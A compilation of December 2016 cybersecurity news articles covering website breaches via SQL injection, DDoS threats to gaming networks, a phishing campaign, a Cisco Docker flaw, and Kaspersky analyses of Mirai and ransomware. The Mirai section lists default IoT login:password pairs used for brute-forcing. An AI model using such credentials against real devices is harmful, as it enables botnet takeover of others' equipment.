What are the 4 tools that cannot be missed in the hacker’s arsenal and why?

4 tools I honestly don’t know. Everyone has a different skill set I’m not the smartest person in the ” scene ”

Which are the most interesting hacking communities on the web today, why?

The most interesting is probably Twitter because it’s fun to mess with people but the most serious are IRC chats that are used by a lot of smart guys.

Did you participate in hacking attacks against the IS propaganda online? When? How? Where do you find IS people to hack?

No, I wasn’t behind that.

How do you choose your targets?

I choose my targets by asking my fans or asking people what they think would be the best one.

We often hear about cyber weapons and cyber attacks against critical infrastructure. Do you believe it is real the risk of a major and lethal cyber attack against a critical infrastructure?

Definitely yes

Cryptolulz666 hacked the Dutch Chamber of Commerce in HK
26.12.2016 securityaffairs Hacking

@Cryptolulz666 and his colleague Kapustkiy broke into the systems of another website belonging to a HK corporation, the Dutch Chamber of Commerce.
The hacker @Cryptolulz666, with a little help from the colleague Kapustkiy, has broken into the website of the Dutch Chamber of Commerce in Hong Kong (http://www.dutchchamber.hk/).

The hacker accessed data belonging to around 200 users, but he decided to leak only half of them as proof of the hack.
Cryptolulz666 told me he exploited a SQL injection vulnerability affecting the website.

A few days ago, he hacked “The Standard Hong Kong” newspaper, he confirmed me that his choice is not casual, he wants to target organizations in Hong kong.

“Yes … As you seen in the previous hack I chose a big corporation in Hong kong and I succeded… this time also chose Hong Kong because I want to make an impact on this country.” he told me. ” no country is safe”
He highlighted the fact that a silly flaw like a SQL Injection could have serious consequences if admins ignore the pillars of security.

Data leaked on Pastebin includes data related to companies working with the Dutch Chamber of Commerce.

Cryptolulz ( @Cryptolulz666) is a former member of the Powerful Greek Army, who hacked several government websites, including the one of the Russian embassy of Armenia (www.embassyru.am).

He also launched DDoS attacks against the website http://italiastartupvisa.mise.gov.it/ belonging to the Italian Government and the website of the Russian Federal Drug Control Service liquidation commission.

The Turkish Government is investigating more than 10,000 people in terror probe

26.12.2016 securityaffairs  Cyber

The Turkish Government is investigating 10000 people suspected of terror-related activity on the internet,accused of propaganda or apologizing for terrorism
The Turkish authorities are investigating more than 10000 individuals over online terror activities. The suspects are accused of being responsible for the sharing of material and post against government officials.

According to the Interior Ministry, the inquiries are part of the “fight against terrorism, which continues with determination everywhere, including on social networks.”

The pressure of the Turkish government is increasing since the coup attempt occurred in July. Authorities are applying a strict censorship of online activities of its citizens.

The Turkish Government has applied restrictions on the Tor anonymity network, and more in general all VPN services, that could be used to avoid censorship.

“Turkey declared a state of emergency and launched deep purges of perceived opponents, sparking concern among human rights groups which accuse Ankara of repression.” reported The SUN.

The Turkish authorities have questioned more than 3,000 people in the last six months, 1,656 of them have been arrested and 84 are still being questioned.

Turkish Government

The accusation for them is “propaganda or apologizing for terrorism” and “insulting state officials.”

The situation in the country is aggravated after the assassination of the Russian Ambassador Andrei Karlov that occurred last week during an exhibition in Ankara. Investigators believe the assassination is part of a terrorist plot to destabilize the relationship between Russia and Turkey.

The Turkish Government fears possible interference through social media, Twitter and YouTube have slowed since the publication of a video in which members of the ISIS burned alive two captured Turkish soldiers.

Malware distribution tactics used in phishing campaign
25.12.2016 securityaffairs

Experts from Proofpoint discovered a new phishing campaign designed to steal banking data leveraging tactics associated with malware distribution.
Security experts from Proofpoint have discovered a new phishing campaign that presents many similarities with campaigns used to spread the Cerber ransomware and the Ursnif banking Trojan.

Cyber criminals adopted a technique that leverages on the distribution of password-protected .zip archive containing a malicious document. The email messages sent by the crooks have the .zip file attached and the message content includes the password to open the archive.

The phishing campaign aims to steal credit card data from the victims, the criminals sent them an HTML attachment that has been password-protected.

phishing campaign 2

The email represents the first digits of the victim’s credit card account number aiming to create a sense of legitimacy without requiring actual knowledge of a potential victim’s actual card number.

The email attempts to trick the victim into giving away their credit card data, they have a sense of urgency requesting recipients to update their security information for their “new chip card.”

“The email sample that we analyzed was personalized with the recipient’s name and what appear to be the starting digits of their credit card account number. The starting digits for credit cards are standardized, though, so this just adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient’s’ card number.” states the report published by Proofpoint. “The emails also use stolen branding and social engineering to create a sense of urgency encouraging the recipient to update security information for their “new chip card””

phishing campaign

The HTML file attachment used in this campaign was XOR-encoded to make harder the dynamic analysis.

Researchers noticed that HTML attachment uses JavaScript to implement the password protection instead using the password-protection feature in Microsoft Word.

When the victim enters the password the HTML attachment is decrypted and a typical credit card phishing template complete with stolen branding is displayed.

“Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security,” added Proofpoint.

Moscow wants Apple to unlock iPhone of the killer of the Russian Ambassador
25.12.2016 securityaffairs Apple

The Russian and Turkish authorities asked Apple to unlock iPhone belonging to the assassin of Russian Ambassador Andrei Karlov.
The Russia’s ambassador to Turkey, Andrei Karlov, was killed on Monday during an exhibition in Ankara. The killer is a lone Turkish gunman that shouted “God is great!” and “don’t forget Aleppo, don’t forget Syria!”

The shooter was killed by Turkish forces in a shoutout and his iPhone 4s was recovered from the special forces.

The man who killed the Russian ambassador was identified as Mevlut Mert Altıntas, an off-duty police officer who used his police ID to gain access to the exhibition where Karlov was giving a speech.

Russian Ambassador Killer

Now Russian authorities want Apple to unlock the killer’s iPhone belonging to Killer of Russian Ambassador.

According to the investigators, the shooter pretended to be an official bodyguard, now Turkish and Russian authorities asked Apple to support the authorities by unlocking the shooter’s iPhone 4S. The request can trigger a new dispute between the Tech giant and the Kremlin, in a similar way to the San Bernardino Shooter case. the authorities believe, could assist them to investigate killer’s links to various terrorist organizations.

The authorities believe that the content on the iPhone could be useful to unmask the terrorist organization linked to the shooter.

It is quite easy to predict a refuse from Apple, for this reason, the Russian government is reportedly sending a team of experts to Ankara to unlock the shooter’s iPhone.

“Apparently Russia offered help and Russia is planning to send a special technical team to Turkey to unlock the iPhone, a senior Turkish official told us.” reported Macreports.com.

According to Macreports the team of experts arrived from Moscow could not unlock the iPhone, but the team was able to retrieve some data from the device without fully unlocking it.

Experts believe the assassination was part of a plot to destabilize the relationship between the Russian Government and the Turkish one.

Merry Xmas, @Kapustkiy hacked Russian Visa center in USA
25.12.2016 securityaffairs Hacking

The notorious white hat hacker Kapustkiy hacked the Russian Visa Center in the USA and accessed information of around 3000 individuals.
The Russian Visa Center is an organization that helps Americans to obtain Russian Visa, this morning the white hat hacker Kapustkiy informed me that he broke into the database its website and accessed data of around 3000 individuals.

Kapustkiy told me to have exploited a SQL Injection in the website, he hacked the website on Friday.

“I used SQL Injection to gain access” said Kapustkiy.

He shared with me the records as proof of the hack, the leaked information include data about individuals that obtained the Russian Visa.

Russian Visa Center hacked

The Russian Visa Center is part of Invisa Logistic Services, it has five offices in the US where people can receive assistance in getting a Russian visa.

The records include their full names, emails, phone numbers, birthday and other information. The archive also includes data of the staff, such as full names, usernames, encrypted passwords, permissions and other information.

Kapustkiy will not make public the accessed data because the database contains sensitive information,

The young hacker contacted the Russian Visa Center but hasn’t received any response, he also reported the issue to the US-CERT.

The young hacker is very active, a few days ago he announced the hack of website of the Costa Rica Embassy in China and the data breach of the Slovak Chamber of Commerce (www.scci.sk) that affected more than 4,000 user records.

Recently Kapustkiy targeted several organizations, including the Consular Department of the Embassy of the Russian Federation, the Argentinian Ministry of Industry, the National Assembly of Ecuador, the Venezuela Army, the High Commission of Ghana & Fiji in India, the India Regional Council as well as organizations and embassies across the world.

He also broke into the ‘Dipartimento dellaFunzione Pubblica’ Office of the Italian Government, the Paraguay Embassy of Taiwan (www.embapartwroc.com.tw), and the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

Hackers threaten to take down Xbox Live and PSN on Christmas Day
24.12.2016 thehackernews Hacking
It's once again the time when most of you will get new PlayStations and XBoxes that continue to be among the most popular gifts for Christmas, but possibilities are you'll not be able to log into the online gaming console, just like what happens on every Christmas holidays.
On 2014 Christmas holidays, the notorious hacker group Lizard Squad knocked the PlayStation Network and Xbox Live offline for many gamers by launching massive DDoS attacks against the gaming networks.
This time a new hacking group, who managed to take down Tumblr this week for almost two hours, has warned gamers of launching another large-scale distributed denial-of-service (DDoS) attack against XBox Live and PlayStation networks.

Calling itself R.I.U. Star Patrol, the hacking group, posted a video on YouTube, announcing that they’re planning to take down Sony’s PSN and Microsoft’s Xbox Live on Christmas Day by launching coordinated DDoS attacks.
"We do it because we can," the group said. "We have not been paid a single dollar for what we do."
On Wednesday, when R.I.U. Star Patrol took down Tumblr, the group contacted Mashable and explained its reason for attacking: "There is no sinister motive. It’s all for light hearted fun."
Neither Sony nor Microsoft has yet responded to the hackers' warning.
However, both Sony and Microsoft previously promised to enhance the protection of their systems to block any attack disrupting their networks, but downtime and short outages happened almost every Christmas time.

Knowing the current abilities of hackers to launch DDoS attack that can reach 1 Tbps, it goes without saying that both the companies should be prepared to see DDoS attacks targeting its servers on this Christmas that can go beyond their expectations.
We saw coordinated DDoS attacks against DNS hosting provider Dyn last fall that broke large portions of the Internet, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify.
The massive DDoS attack was launched just by a botnet of an estimated 100,000 so-called Internet of Things (IoT) – everyday devices and appliances that are connected to the web – that closed down the Internet for millions of users.
So, it remains to be seen if gamers would be able to enjoy this Christmas or not.

Hackers breached the “The Standard Hong Kong” newspaper
24.12.2016 securityaffairs Hacking

The hacker @Cryptolulz666 and his colleague @EvoIsGod have broken into the website of the Hong Kong English newspaper “The Standard Hong Kong” (www.thestandard.com.hk)
The hackers breached the database of the website and uploaded data to Pastebin.

I reached the hackers who confirmed to have hacked the website by exploiting a SQL Injection flaw in their CMS.

Standard Hong Kong

The hackers posted only a small portion of around 12000 users contained in the database.

“Most of the info is not dumped due to legal stuffs. It had around 12000 users but I dumped only quarter” wrote the hackers on Pastebin.

The hackers leaked the tables of the Customers and Employees.

According to @Cryptolulz666, most of the information in the database is quite confidential and should not be leaked for privacy reason.
When I asked them about the motivation of the attack they told me that their goal is to spread awareness of cyber security.

“Our objective is to embarrass the institutions… by exploiting their silly flaws…” they told me. “As I said we exploited a SQL injection vulnerability on their main website.”

Cryptolulz ( @Cryptolulz666) is a former member of the Powerful Greek Army, who hacked several government websites, including the one of the Russian embassy of Armenia (www.embassyru.am).

He also launched DDoS attacks against the website http://italiastartupvisa.mise.gov.it/ belonging to the Italian Government and the website of the Russian Federal Drug Control Service liquidation commission.

Hackers want to take down Xbox Live and PSN on Christmas Day

24.12.2016 securityaffairs Hacking

Christmas time is a critical period for the gaming industry that is threatened by hackers that want to paralyze their services with massive attacks.

Yesterday I reported the DDoS attacks launched by Phantom Squad and PoodleCorp against Steam and Origin Servers, and unfortunately they are not alone.

Hackers threaten to take down Xbox Live and PSN on Christmas Day, and we know that someone already done is in the same period two years ago when Lizard Squad hackers took down the networks of Sony PSN and Microsoft XBox Live.

Which are the risks for gamers?

People that will buy or will receive new PlayStation and XBoxe consoles will not be able to log into the online gaming console, it will be not possible to download and buy online games, neither play online with other gamers.

Now a hacker group that called itself R.I.U. Star Patrol (StarPatrolling) posted a video on YouTube, announcing that they will take down Xbox Live and PSN on Christmas Day with a massive DDoS attack.
The threat is considered credible, the same group managed to take down Tumblr this week for two hours.

“We do it because we can,” the group said. “We have not been paid a single dollar for what we do.”
R.I.U. Star Patrol @StarPatrolling
@mashable We are claiming responsibility for the Tumblr outage #StarPatrol
23:14 - 21 Dic 2016
1 1 Retweet 2 2 Mi piace
Just after the attack, the hackers released an interview with Mashable and motivated the attack with the following statement.

“There is no sinister motive,” they replied when asked for the cause of the attacks.”It’s all for light hearted fun.”

Via DM, the group told Mashable the DDoS attack wasn’t meant to harm anyone.

Xbox Live and PSN networks were both target in the past by hacker so they worked to improve their defense anyway recent attacks powered by the Mirai botnet demonstrated that it could be quite simple for hackers to take down major web services.

Phantom Squad and PoodleCorp tango down against Steam and Origin Servers
24.12.2016 securityaffairs Hacking
The servers of the Steam gaming platform and Origin are down. Phantom Squad and PoodleCorp are claiming responsibility for the attacks.
It’s holiday time and hackers can transform this period in a nightmare for gamers. Two years ago Lizard Squad hackers took down the networks of Sony PSN and Microsoft XBox Live.

Now the notorious Phantom Squad group has claimed responsibility for conducting a series of massive DDoS attacks against the online gaming platform Steam and Origin servers.

According to HackRead, Phantom Squad and one of the members of the PoodleCorp hacker crew, @cripthepoodle, are targeting Steam and Origin accounts.

One year ago, Phantom Squad launched several cyber attacks against Electronic Arts and Steam last year. PoodleCorp hacker group became famous due to a long string of attacks against gaming communities, including Blizzard, EA, GTA, PlayStation, PokemonGo, and League of Legends.

At the time I was writing, both companies haven’t confirmed the attacks against their systems. Some users are reporting problems to both via Twitter.

Below one of the numerous tweets from affected users:

22 Dic
Steam ✔ @steam_games
Steam Winter Sale On Now! Plus, Vote For The Steam Awards! #SteamSale #SteamAwards http://zpr.io/PGkCe pic.twitter.com/T3iqTvsPgI
René | 2 Days ^-^ @DafuqRene
@steam_games Nice Sale, I love it! #SteamSale pic.twitter.com/RshEFsBBDk
20:14 - 22 Dic 2016
Visualizza l'immagine su Twitter
13 13 Retweet 80 80 Mi piace
The Down Detector service that provides information about the status of services confirmed that both EA and Steam platforms were down at the time I was writing.

The hackers started the DDoS attack on Steam servers causing serious problems to the gaming servers across the world. Steam operates about 17 regional servers, all its activities including the Steam community and the Steam Store are down, this means that users are not able to buy Steam games for Christmas.

steam status

Stay Tuned …


Steam services are back up now

Cyber attacks against the healthcare industry are expected to grow
24.12.2016 securityaffairs Cyber
The number of cyber attacks against organizations in the healthcare industry is increasing, this trend is expected to continue in 2017.
The monitoring of the activity in the cyber criminal underground is essential for investigators and security experts. The value of illegal products and services gives us a precious information on cyber criminal trends. Security experts are observing a significant drop in the black market value of stolen medical records, this data suggests criminal organizations are focusing their efforts elsewhere.

Criminal organizations are more focused on stealing data to spread ransomware, according to a report released by the security firm TrapX.

Crooks are offering stolen records for a price ranging between $1.50 and $10 each. Across the months the price is dropped as never before, this summer cyber criminals offered 10 million patient records on TheRealDeal black marketplace for about $820,000, roughly $12 per record. Lots of data containing a smaller number of records were offered with a price per single records ranging from $40 up to $60. In 2012 the World Privacy Forum estimated the value of medical records on the criminal underground at around $50 each.

Data in medical records are precious commodities for crooks that can use them for identity theft and medical billing frauds and scams.

Anthony James, CMO at TrapX explained that the black market has become saturated, in 2015 expert estimated that about 112 million records were stolen, including 80 million records from the Anthem data breach.

“2015 was obviously a year where cybersecurity came to the forefront for the health care industry,” James told to CSOonline.

Another interesting data emerged from the report is the number of organizations breached by cyber criminals that passed from 57 last year to 93 this year, up from 36 in 2015.

The overall number of records lost fell by nearly 90 percent to just 12 million records.

TrapX analyzed all the breaches reported to the Department of Health and Human Services resulting from hacking activities.

According to the experts, 31% of all major HIPAA data breaches were caused by sophisticated attacks, a 300% increase over the past three years.

“Researchers pinpointed two major trends from 2016: the continued discovery and evolution of medical device hijacking, which TrapX calls MEDJACK and MEDJACK.2, and the increase of ransomware across a variety of targets.” reported DarkReading.

The researchers explained that companies that have six months to report the incident, this means that we will have news of some attacks occurred in 2016 during H1 2017 and the estimates made by the experts at TrapX could be pejorative.

The experts highlighted that the falling price for stolen records is pushing scammers to try to monetize their efforts in other ways, like ransomware-based attacks.

“That’s why ransomware has started to increase,” James said. “That’s where they’re getting their money now.”

This trend is expected to continue in 2017 that will be a difficult year for the healthcare.

Signal implements ‘domain fronting’ technique to bypass censorship
23.12.2016 securityaffairs Hacking

The latest update of Signal introduces the ‘domain fronting’ technique that has been implemented to circumvent censorship.
Signal is considered the most secure instant messaging app, searching for it on the Internet it is possible to read the Edward Snowden’ testimony:

“Use anything by Open Whisper Systems” Snowden says.
The Cryptographer and Professor at Johns Hopkins University Matt Green and the popular security expert Bruce Schneier are other two admirers of the Signal app.

The latest update of Signal has just been developed to implement mechanisms to circumvent censorship and restrictions applied by governments that want to avoid its use.

Some states are already blocking the application with the support of ISPs. The Government of Egypt and the United Arab Emirates applied measures to block Signal, for this reason, the Open Whisper Systems who develop the app has revised the Android version introducing a technique called domain fronting.

“With today’s release, domain fronting is enabled for Signal users who have a phone number with a country code from Egypt or the UAE,” said company founder Moxie Marlinspike in a blog post. “When those users send a Signal message, it will look like a normal HTTPS request to www.google.com. To block Signal messages, these countries would also have to block all of google.com.”

The domain fronting is a technique that relies on the use of different domain names at different application layers to evade censorship.

The domain fronting techniques “hides the remote endpoint of a communication. Domain fronting works at the application layer, using HTTPS, to communicate with a forbidden host while appearing to communicate with some other host, permitted by the censor,” as described in a paper published by researchers from the University of California, Berkeley, Psiphon, and Brave New Software.

“The key idea is the use of different domain names at different layers of communication. One domain appears on the “outside” of an HTTPS request—in the DNS request and TLS Server Name Indication—while another domain appears on the “inside”—in the HTTP Host header, invisible to the censor under HTTPS encryption.” continues the paper.”A censor, unable to distinguish fronted and nonfronted traffic to a domain, must choose between allowing circumvention traffic and blocking the domain entirely, which results in expensive collateral damage”

The Domain fronting technique is easy to deploy and use and doesn’t require special activities by network intermediaries.

If the front domain is a popular website like ‘google.com, if the censor will block it would have a serious impact on the users.

Domain fronting has a cost.

Domain fronting leverages a CDN that have to receive the request and forward it to the domain in the HTTP host header, or a service that provides similar functionality, like Google’s App Engine.

Such services typically have a cost that according to the paper ranges from $0.10–0.25 per GB using a service like Google App Engine, Amazon CloudFront, Microsoft Azure, Fastly, and CloudFlare. This may explain why Signal isn’t making domain fronting a default everywhere.

Due to this cost, Signal isn’t providing domain fronting by default.

What about domain fronting for the iOS version of Signal?

Marlinspike confirmed that an iOS version of Signal that supports domain fronting is expected soon, meantime it is available a beta version.

A flaw in Cisco CloudCenter Orchestrator exploited by hackers in the wild
23.12.2016 securityaffairs
Cisco is warning customers about a critical privilege escalation flaw that has been exploited in attacks against the Cisco CloudCenter Orchestrator systems.
Cisco has warned its customers of a critical privilege escalation flaw in Cisco CloudCenter Orchestrator systems, tracked as CVE-2016-9223, that has been exploited in cyber attacks.

The Cisco CloudCenter is a hybrid cloud management platform composed of a CloudCenter Manager and CloudCenter Orchestrator. The CloudCenter Manager is the interface utilized by users and administrators, while the CloudCenter Orchestrator allows to model, deploy and manage new and existing applications.

Cisco CloudCenter Orchestrator flaw

An unauthenticated attacker can remotely install malicious Docker containers with high privileges by exploiting a vulnerability in the Docker Engine configuration.

“A vulnerability in the Docker Engine configuration of Cisco CloudCenter Orchestrator (CCO; formerly CliQr) could allow an unauthenticated, remote attacker to install Docker containers with high privileges on the affected system.” states the security advisory published by CISCO.
An attacker can exploit this issue to load Docker containers with arbitrary privileges, including root.

“The vulnerability is due to a misconfiguration that causes the Docker Engine management port to be reachable outside of the CloudCenter Orchestrator system. An attacker could exploit this vulnerability by loading Docker containers on the affected system with arbitrary privileges. As a secondary impact this may allow the attacker to gain root privileges on the affected CloudCenter Orchestrator.”

The experts from CISCO discovered the critical flaw while working on a support case. The issue exists due to a misconfiguration that exposed the Docker Engine management port from the outside.

According to CISCO, vulnerable Cisco CloudCenter Orchestrator (CCO) deployments have the Docker Engine TCP port 2375 open and bound to local IP address

The command netstat -ant | grep 2375 command could allow a rapid check of a configuration.

The Cisco Product Security Incident Response Team (PSIRT) confirmed that the flaw had been exploited in attacks in the wild.

CISCO fixed the issue by releasing the CCO version 4.6.2. The company also suggests as a workaround to restrict the Docker Engine port to the localhost IP address

Is Mirai Really as Black as It’s Being Painted?
23.12.2016 Kaspersky
The Mirai botnet, which is made up of IoT devices and which was involved in DDoS attacks whose scale broke all possible records, causing denial of service across an entire region, has been extensively covered by the mass media. Given that the botnet’s source code has been made publicly available and that the Internet of Things trend is on the rise, no decline in IoT botnet activity should be expected in the near future.

To put this in perspective, recall the year 2012, when the source code of the Zeus banker Trojan was made publicly available. A huge number of modifications of the Trojan appeared as a result of this, many of which are still active and rank among the most widespread financial malware. Similarly, the recent leak is likely to result in the emergence of Mirai modifications, created by cybercriminals and based on the source code that was made public.

The botnet remains active. We carried out an analysis of its activity to find out how Mirai operates, what objectives its owners are pursuing and, most importantly, what needs to be done to avoid becoming part of the botnet in the future.

How Mirai Works

Based on the botnet’s source code that was published on a user forum, Mirai consists of the following components:

a command-and-control center (C&C) that contains a MySQL database of all infected IoT devices (bots) and sends commands to intermediate command distribution servers;
a Scan Receiver component that collects the results of each bot’s operation and forwards them to the component that downloads the bot onto vulnerable devices (the Distributor);
a downloader component, which delivers the bot’s binary file to a vulnerable device (using the wget and tftp utilities – but if they are not present in the system, it uses its own proprietary downloader);
a bot, which, after being launched on an infected device, connects to the command-and-control center, scans an IP range (SYN scanning) for vulnerable IoT devices and sends the scan results to the Scan Receiver component in order for further malicious code to be subsequently downloaded to the device.
An important feature of the way the Mirai botnet scans devices is that the bot uses a login and password dictionary when trying to connect to a device. The author of the original Mirai included a relatively small list of logins and passwords for connecting to different devices. However, we have seen a significant expansion of the login and password list since then, achieved by including default logins and passwords for a variety of IoT devices, which means that multiple modifications of the bot now exist.

Is Mirai Really as Black as It's Being Painted?

List of logins and passwords used by the original Mirai in its search for vulnerable IoT devices

However, this is by no means all the Mirai botnet can tell us about itself.

Analysis of the Botnet’s Activity

All you need to do to evaluate the Mirai botnet’s current activity is to deploy a server with an open telnet port somewhere on the Internet and analyze connection attempts made by different bots. For example, we detected the first attempts to connect to our telnet port, by several different hosts, within three minutes of putting our experimental server online.

Two facts indicate that these connections are made by bots of the original Mirai or its modifications (i.e., by infected devices):

the accounts used by the bots in their attempts to establish a connection are found on the original botnet’s brute force word list;
an analysis of connection sources has shown that infected hosts that perform scanning are in most cases IoT devices (cameras and routers of different manufacturers).

Is Mirai Really as Black as It's Being Painted?
Connection attempts by infected Mirai workstations in search of IoT devices using default passwords

Here is a list of login and password pairs most often used by Mirai bots in connection attempts:

“Login:password” combinations
1 admin : admin
2 root : xc3511
3 root : vizxv
4 root : juantech
5 root : default
6 admin : admin1234
7 root : password
8 root : root
9 root : xmhdipc
10 admin : smcadmin
If you ignore trivial combinations like “root:root” or “admin:admin”, you can get a good idea of which equipment the botnet is looking for. For example, the pairs “root:xc3511” and “root:vizxv” are default accounts for IP cameras made by rather large Chinese manufacturers.

Is Mirai Really as Black as It's Being Painted?

Admin panel for managing an IP camera that is part of the botnet

As for the activity of the botnet itself, you can analyze the number of login attempts over 24 hours and see for yourself. On December 13, 2016 we recorded 5,553 attempts by Mirai bots to connect to our server, while 10 days before that, on December 3, 2016, we recorded 8,689 connection attempts. Does this mean that the botnet is losing power? Reduced activity related to searching for new potential bots might certainly be an indication that the rate at which Mirai is infecting new devices is falling, but it is too early to draw any conclusions.

How to Avoid Becoming Part of the Mirai Botnet

We recommend the following measures to prevent your devices from being included in the Mirai botnet:

Change the default account parameters on each of your devices. Account passwords should be at least 8 characters long and include digits, upper-case letters and special characters.
On each device, install the latest updates provided by the manufacturer.
It is a good idea to block all potential entry points to the operating system on your devices (telnet/SSH/web panel, etc.) from being accessed over the Internet.

Kaspersky Security Bulletin 2016. The ransomware revolution
23.12.2016 Kaspersky Analysis


In 2016, ransomware continued its rampage across the world, tightening its hold on data and devices, and on individuals and businesses.

The numbers speak for themselves:

62 new ransomware families made their appearance.
There was an 11-fold increase in the number of ransomware modifications: from 2,900 new modifications in January/March, to 32,091 in July/September.
Attacks on business increased three-fold between January and the end of September: the difference between an attack every 2 minutes and one every 40 seconds.
For individuals the rate of increase went from every 20 seconds to every 10 seconds.
One in five small and medium-sized business who paid the ransom never got their data back.
Kaspersky Security Bulletin 2016. Story of the year

2016 also saw ransomware grow in sophistication and diversity, for example: changing tack if it encountered financial software, written in scripting languages, exploiting new infection paths, becoming more targeted, and offering turn-key ransomware-as-a-service solutions to those with fewer skills, resources or time – all through a growing and increasingly efficient underground ecosystem.

At the same time, 2016 saw the world begin to unite to fight back:

The No More Ransom project was launched in July, bringing togetheal Police, Europol, Intel Security and Kaspersky Lab. A further 13 organizations joined in October. Among other things, the collaboration has resulted in a number of free online decryption tools that have so far helped thousands of ransomware victims to recover their data.

This is just the tip of the iceberg – much remains to be done. Together we can achieve far more than any of us can on our own.

What is ransomware?

Ransomware comes in two forms. The most common form of ransomware is the cryptor. These programs encrypt data on the victim’s device and demand money in return for a promise to restore the data. Blockers, by contrast, don’t affect the data stored on the device. Instead, they prevent the victim from accessing the device. The ransom demand, displayed across the screen, typically masquerades as a notice from a law enforcement agency, reporting that the victim has accessed illegal web content and indicating that they must pay a spot-fine. You can find an overview of both forms of ransomware here.

Ransomware: the main trends & discoveries of 2016

“Most ransomware thrives on an unlikely relationship of trust between the victim and their attacker: that, once payment is received, the ransomed files will be returned. Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling this promise.”

GReAT, Threat Predictions for 2017

Kaspersky Security Bulletin 2016. Story of the year

Arrivals and departures

Arrivals – in 2016, the world said hello to Cerber, Locky and CryptXXX – as well as to 44,287 new ransomware modifications

Cerber and Locky arrived in the early Spring. Both are nasty, virulent strains of ransomware that are propagated widely, mainly through spam attachments and exploit kits. They rapidly established themselves as ‘major players’, targeting individuals and corporates. Not far behind them was CryptXXX. All three families continue to evolve and to hold the world to ransom alongside well-established incumbents such as CTB-Locker, CryptoWall and Shade.

Locky ransomware has so far been spread across 114 countries #KLReport

As of October 2016, the top ransomware families detected by Kaspersky Lab products look like this:

Name Verdicts* percentage of users**
1 CTB-Locker Trojan-Ransom.Win32.Onion /
Trojan-Ransom.NSIS.Onion 25.32
2 Locky Trojan-Ransom.Win32.Locky /
Trojan-Dropper.JS.Locky 7.07
3 TeslaCrypt (active till May 2016) Trojan-Ransom.Win32.Bitman 6.54
4 Scatter Trojan-Ransom.Win32.Scatter /
Trojan-Ransom.BAT.Scatter /
Trojan-Downloader.JS.Scatter /
Trojan-Dropper.JS.Scatter 2.85
5 Cryakl Trojan-Ransom.Win32.Cryakl 2.79
6 CryptoWall Trojan-Ransom.Win32.Cryptodef 2.36
7 Shade Trojan-Ransom.Win32.Shade 1.73
8 (generic verdict) Trojan-Ransom.Win32.Snocry 1.26
9 Crysis Trojan-Ransom.Win32.Crusis 1.15
10 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 0.90
* These statistics are based on the detection verdicts returned by Kaspersky Lab products, received from usersof Kaspersky Lab products who have consented to provide their statistical data.
** Percentage of users targeted by a certain crypto-ransomware family relative to all users targeted with crypto-ransomware.

Departures – and goodbye to Teslascrypt, Chimera and Wildfire – or so it seemed…

Kaspersky Security Bulletin 2016. Story of the year

Probably the biggest surprise of 2016 was the shutdown of TeslaCrypt and the subsequent release of the master key, apparently by the malware actors themselves.

TeslaCrypt “committed suicide” – while the police shut down Encryptor RaaS and Wildfire #KLReport

Encryptor RaaS, one of the first Trojans to offer a Ransomware-as-a-Service model to other criminals shut up shop after part of its botnet was taken down by the police.

Then, in July, approximately 3,500 keys for the Chimera ransomware were publicly released by someone claiming to be behind the Petya/Mischa ransomware. However, since Petya used some of the Chimera source code for its own ransomware, it could in fact be the same group, simply updating its product suite and causing mischief.

Similarly, Wildfire, whose servers were seized and a decryption key developed following a combined effort by Kaspersky Lab, Intel Security and the Dutch Police, now appears to have re-emerged as Hades.

Abuse of ‘educational’ ransomware

Kaspersky Security Bulletin 2016. Story of the year

Well-intentioned researchers developed ‘educational’ ransomware to give system administrators a tool to simulate a ransomware attack and test their defenses. Criminals were quick to seize upon these tools for their own malicious purposes.

Ransomware developed for ‘education’ gave rise to Ded Cryptor and Fantom, among others #KLReport

The developer of the educational ransomware Hidden Tear & EDA2 helpfully posted the source code on GitHub. Inevitably, 2016 saw the appearance of numerous malicious Trojans based on this code. This included Ded Cryptor, which changed the wallpaper on a victim computer to a picture of an evil-looking Santa Claus, and demanded a massive two Bitcoins (around $1,300) as a ransom. Another such program was Fantom, which simulated a genuine-looking Windows update screen.

Unconventional approaches

Why bother with a file when you can have the disk?

New approaches to ransomware attacks that were seen for the first time in 2016 included disk encryption, where attackers block access to, or encrypt, all the files at once. Petya is an example of this, scrambling the master index of a user’s hard drive and making a reboot impossible. Another Trojan, Dcryptor, also known as Mamba, went one step further, locking down the entire hard drive. This ransomware is particularly unpleasant, scrambling every disk sector including the operating system, apps, shared files and all personal data – using a copy of the open source DiskCryptor software.

Attackers are now targeting back-ups and hard drives – and brute-forcing passwords #KLReport

The ‘manual’ infection technique

Dcrypter’s infection is carried out manually, with the attackers brute-forcing passwords for remote access to a victim machine. Although not new, this approach has become significantly more prominent in 2016, often as a way to target servers and gain entry into a corporate system.

If the attack succeeds, the Trojan installs and encrypts the files on the server and possibly even on all the network shares accessible from it. We discovered TeamXRat taking this approach to spread its ransomware on Brazilian servers.

Two-in-one infection

In August we discovered a sample of Shade that had unexpected functionality: if an infected computer turned out to belong to financial services, it would instead download and install a piece of spyware, possibly with the longer term aim of stealing money.

Shade downloaded spyware if it found financial software #KLReport

Ransomware in scripting languages

Kaspersky Security Bulletin 2016. Story of the year

Another trend that attracted our attention in 2016 was the growing number of cryptors written in scripting languages. In the third quarter alone, we came across several new families written in Python, including HolyCrypt and CryPy, as well as Stampado written in AutoIt, the automation language.

A long line of amateurs and copycats

Many of the new ransomware Trojans detected in 2016 turned out to be of low-quality; unsophisticated, with software flaws and sloppy errors in the ransom notes.

Poor quality ransomware increases likelihood of data being lost forever #KLReport

This was accompanied by a rise in copycat ransomware. Among other things, we spotted that:

Bart copies the ransom note & the style of Locky’s payment page.
An Autoit-based copycat of Locky (dubbed AutoLocky) uses the same extension “.locky”.
Crusis (aka Crysis) copies the extension “.xtbl” originally used by Shade.
Xorist copies the whole naming scheme of the files encrypted by Crusis.
Probably the most prominent copycat we discovered this year was Polyglot (aka MarsJoke). It fully mimics the appearance and file processing approach of CTB-Locker.

These trends are all expected to increase in 2017.

